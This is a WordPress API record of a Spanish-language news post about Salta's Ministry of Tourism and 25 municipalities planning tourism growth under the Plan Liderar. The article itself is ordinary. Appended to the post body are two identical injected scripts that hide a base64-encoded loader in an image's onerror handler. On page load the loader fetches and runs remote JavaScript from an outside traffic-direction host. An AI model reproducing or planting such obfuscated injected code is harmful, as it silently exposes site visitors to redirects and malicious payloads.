{"id":2348,"date":"2023-03-14T17:06:32","date_gmt":"2023-03-14T20:06:32","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2348"},"modified":"2025-08-14T00:21:13","modified_gmt":"2025-08-14T03:21:13","slug":"el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2348","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-88480\">El Ministerio de Turismo y 25 municipios tur\u00edsticos planifican juntos el crecimiento de Salta<\/a>"},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#7f253c\"><em>Se reuni\u00f3 en Rosario de la Frontera el equipo del destino Salta, integrado por el Ministerio de Turismo, el sector privado, directores y secretarios municipales para avanzar en el crecimiento del turismo en l\u00ednea con el plan Liderar.<\/em><\/h5>\n\n\n\n<p>El destino Salta es ejemplo en el pa\u00eds en lo referente al trabajo en conjunto entre los actores de la actividad tur\u00edstica, en este marco en Rosario de la Frontera se realiz\u00f3 la Jornada Provincial de Turismo 2023, Di\u00e1logo para la Acci\u00f3n.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6167-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg\" alt=\"\" class=\"wp-image-2356\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6167-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6167-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6167-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6167-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6167-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<p>Confluyeron 25 directores y secretarios, de los municipios diferentes de las regiones tur\u00edsticas de la provincia.<\/p>\n\n\n\n<p>\u201cEl Plan Liderar se dise\u00f1\u00f3 con una mirada federal, con 25 mil kil\u00f3metros recorridos para escuchar, intercambiar experiencias y de ah\u00ed construir un camino que a partir del crecimiento de la actividad, para que el turismo sea una herramienta que mejore la calidad de vida en toda la provincia como nos pide el gobernador Gustavo S\u00e1enz, juntos es la \u00fanica manera de lograrlo\u201d, afirm\u00f3 el funcionario.<\/p>\n\n\n\n<p>Pe\u00f1a tambi\u00e9n resalt\u00f3 la cantidad de obras que forman parte del plan Liderar, con una inversi\u00f3n en cinco a\u00f1os de 100 millones de d\u00f3lares destacando, adem\u00e1s, que el Gobierno tiene m\u00e1s de 1600 obras en los 60 municipios, que no son tur\u00edsticas pero en muchos casos impacta por la transversalidad de esta actividad.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6168-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-20230314171529.jpg\" alt=\"\" class=\"wp-image-2349\"\/><\/figure>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo de Salta Gustavo Di M\u00e9cola se pronunci\u00f3 en el mismo sentido, consider\u00f3 que es importante el trabajo conjunto con el sector privado representado en la instituci\u00f3n que conduce y en las c\u00e1maras del interior.<\/p>\n\n\n\n<p>Estuvieron en Rosario de la Frontera, el secretario de Cultura y Turismo Fernando Garc\u00eda Soria, la presidenta de AHT Mariana Farjat, su par de ASAT L\u00eda Rivella y el presidente de la C\u00e1mara Hotelera Gastron\u00f3mica y Afines de Salta, Juan Lucero.<\/p>\n\n\n\n<p>La Jornada fue coordinada por la Secretar\u00eda de Turismo a trav\u00e9s del \u00e1rea de Desarrollo y Competitividad Tur\u00edstica, a cargo de Alejandro Cha.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"560\" height=\"373\" data-id=\"2350\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2812-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg\" alt=\"\" class=\"wp-image-2350\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2812-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2812-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-300x200.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"560\" height=\"373\" data-id=\"2351\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2811-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg\" alt=\"\" class=\"wp-image-2351\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2811-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2811-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-300x200.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"373\" data-id=\"2352\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2810-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg\" alt=\"\" class=\"wp-image-2352\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2810-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2810-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-300x200.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"373\" data-id=\"2354\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2809-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg\" alt=\"\" class=\"wp-image-2354\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2809-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2809-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-300x200.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"373\" data-id=\"2355\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2808-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg\" alt=\"\" class=\"wp-image-2355\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2808-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2808-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-300x200.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2353\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6168-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-20230314171529-1.jpg\" alt=\"\" class=\"wp-image-2353\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6168-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-20230314171529-1.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6168-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-20230314171529-1-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6168-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-20230314171529-1-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6168-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-20230314171529-1-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/6168-el-ministerio-de-turismo-y-25-municipios-turisticos-planifican-juntos-el-crecimiento-de-salta-20230314171529-1-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se reuni\u00f3 en Rosario de la Frontera el equipo del destino Salta, integrado por el Ministerio de Turismo, el sector privado, directores y secretarios municipales para avanzar en el crecimiento del turismo en l\u00ednea con el plan Liderar. El destino Salta es ejemplo en el pa\u00eds en lo referente al trabajo en conjunto entre los [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2357,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-2348","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2348"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2348"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2348\/revisions"}],"predecessor-version":[{"id":7146,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2348\/revisions\/7146"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2357"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2348"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2348"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}